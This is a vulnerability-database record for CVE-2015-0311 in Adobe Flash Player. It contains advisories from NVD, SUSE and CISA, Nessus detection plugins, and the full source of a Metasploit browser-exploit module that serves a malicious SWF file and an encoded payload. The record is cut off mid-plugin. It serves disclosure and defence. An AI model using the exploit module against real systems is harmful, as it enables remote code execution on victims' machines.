{"attackerkb": [{"lastseen": "2020-11-22T06:21:50", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:46am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2015-01-23T00:00:00", "id": "AKB:BDDA4B10-E45B-4921-9358-9D6BA5D36119", "href": "https://attackerkb.com/topics/5k9swtQda0/cve-2015-0311", "type": "attackerkb", "title": "CVE-2015-0311", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:02:59", "description": "Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.", "edition": 5, "cvss3": {}, "published": "2015-01-23T21:59:00", "title": "CVE-2015-0311", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0311"], "modified": "2015-02-14T03:00:00", "cpe": ["cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:11.2.202.438", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125", "cpe:/a:adobe:flash_player:13.0.0.262"], "id": "CVE-2015-0311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0311", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.438:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}], "suse": [{"lastseen": "2016-09-04T11:38:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\n CVE-2015-0311).\n\n More information can be found on\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>\n\n An update of flashplayer (executable binary) for i386 is currently not\n available. Disabled!\n\n", "edition": 1, "modified": "2015-01-27T10:05:24", "published": "2015-01-27T10:05:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00026.html", "id": "OPENSUSE-SU-2015:0150-1", "title": "Security update for flash-player (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\n CVE-2015-0311).\n\n More information can be found on\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>\n\n An update of flashplayer (executable binary) for i386 is currently not\n available. Disabled!\n\n", "edition": 1, "modified": "2015-01-27T14:04:56", "published": "2015-01-27T14:04:56", "id": "SUSE-SU-2015:0151-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00027.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:07:45", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\n APSA15-01, CVE-2015-0311).\n\n More information can be found at\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>\n <<a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>> .\n\n An update of flashplayer (executable binary) for i386 is currently not\n available and was thus disabled.\n\n Security Issues:\n\n * CVE-2015-0311\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0311\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0311</a>>\n\n", "edition": 1, "modified": "2015-01-28T19:08:21", "published": "2015-01-28T19:08:21", "id": "SUSE-SU-2015:0163-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00031.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0302", "CVE-2015-0311", "CVE-2015-0307", "CVE-2015-0306", "CVE-2015-0310"], "edition": 1, "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463):\n * APSA15-01, CVE-2015-0311\n - Update of flashplayer (executable binary) for i386 is not available.\n This binary was disabled.\n\n - Security update to 11.2.202.438 (bsc#914333):\n * APSB15-02, CVE-2015-0310\n\n - Security update to 11.2.202.429 (bsc#913057):\n * APSB15-01, CVE-2015-0301, CVE-2015-0302, CVE-2015-0303, CVE-2015-0304,\n CVE-2015-0305, CVE-2015-0306, CVE-2015-0307, CVE-2015-0308,\n CVE-2015-0309.\n - Disable flash player on machines without SSE2 (bnc#856386).\n - Remove outdated README and keep only up-to-date readme.txt.\n\n", "modified": "2015-01-29T14:04:51", "published": "2015-01-29T14:04:51", "id": "OPENSUSE-SU-2015:0174-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00034.html", "title": "Security update for flash-player (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2020-12-18T18:07:58", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Adobe has released Flash Player desktop version 16.0.0.296 to address a critical vulnerability ([CVE-2015-0311](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0311>)) in 16.0.0.287 and earlier versions for Windows and Macintosh. This vulnerability could allow an attacker to take control of the affected system.\n\nUsers and administrators are encouraged to review Adobe Security Bulletin [APSB15-01](<http://helpx.adobe.com/security/products/flash-player/apsa15-01.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2015/01/26/Security-Advisory-Adobe-Flash-Player>); we'd welcome your feedback.\n", "modified": "2015-01-26T00:00:00", "published": "2015-01-26T00:00:00", "id": "CISA:A9E57108EE62842BE32ACEED1F317122", "href": "https://us-cert.cisa.gov/ncas/current-activity/2015/01/26/Security-Advisory-Adobe-Flash-Player", "type": "cisa", "title": "Security Advisory for Adobe Flash Player", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T23:57:39", "description": "This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on: * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305. * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Flash 11.2.202.424.\n", "published": "2015-05-20T23:57:59", "type": "metasploit", "title": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_UNCOMPRESS_ZLIB_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',\n 'Description' => %q{\n This module exploits a use after free vulnerability in Adobe Flash Player. The\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying\n to uncompress() a malformed byte stream. This module has been tested successfully\n on:\n * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Flash 11.2.202.424.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and exploit in the wild\n 'hdarwin', # Public exploit by @hdarwin89\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-0311'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],\n ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],\n ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^16\\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-04-28',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb"}], "nessus": [{"lastseen": "2020-06-05T11:12:28", "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\nCVE-2015-0311).\n\nMore information can be found on\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable. Disabled!", "edition": 17, "published": "2015-01-28T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2015:0150-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "modified": "2015-01-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-78.NASL", "href": "https://www.tenable.com/plugins/nessus/81030", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-78.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81030);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-0311\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2015:0150-1)\");\n script_summary(english:\"Check for the openSUSE-2015-78 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\nCVE-2015-0311).\n\nMore information can be found on\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable. Disabled!\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00082.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.440-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.440-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.440-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.440-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.440-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.440-2.29.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:41:19", "description": "Adobe reports :\n\nSuccessful exploitation could cause a crash and potentially allow an\nattacker to take control of the affected system. We are aware of\nreports that this vulnerability is being actively exploited in the\nwild via drive-by-download attacks against systems running Internet\nExplorer and Firefox on Windows 8.1 and below.", "edition": 21, "published": "2015-01-27T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerability (37a87ade-a59f-11e4-958e-0011d823eebd)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "modified": "2015-01-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_37A87ADEA59F11E4958E0011D823EEBD.NASL", "href": "https://www.tenable.com/plugins/nessus/81009", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81009);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0311\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerability (37a87ade-a59f-11e4-958e-0011d823eebd)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nSuccessful exploitation could cause a crash and potentially allow an\nattacker to take control of the affected system. We are aware of\nreports that this vulnerability is being actively exploited in the\nwild via drive-by-download attacks against systems running Internet\nExplorer and Firefox on Windows 8.1 and below.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\"\n );\n # https://vuxml.freebsd.org/freebsd/37a87ade-a59f-11e4-958e-0011d823eebd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c4c162d5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<=11.2r202.438\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<=11.2r202.438\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:17:17", "description": "Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\nAPSA15-01, CVE-2015-0311).\n\nMore information can be found at\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n.\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable and was thus disabled.", "edition": 23, "published": "2015-01-29T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 10226)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "modified": "2015-01-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-150127.NASL", "href": "https://www.tenable.com/plugins/nessus/81077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81077);\n script_version(\"1.8\");\n 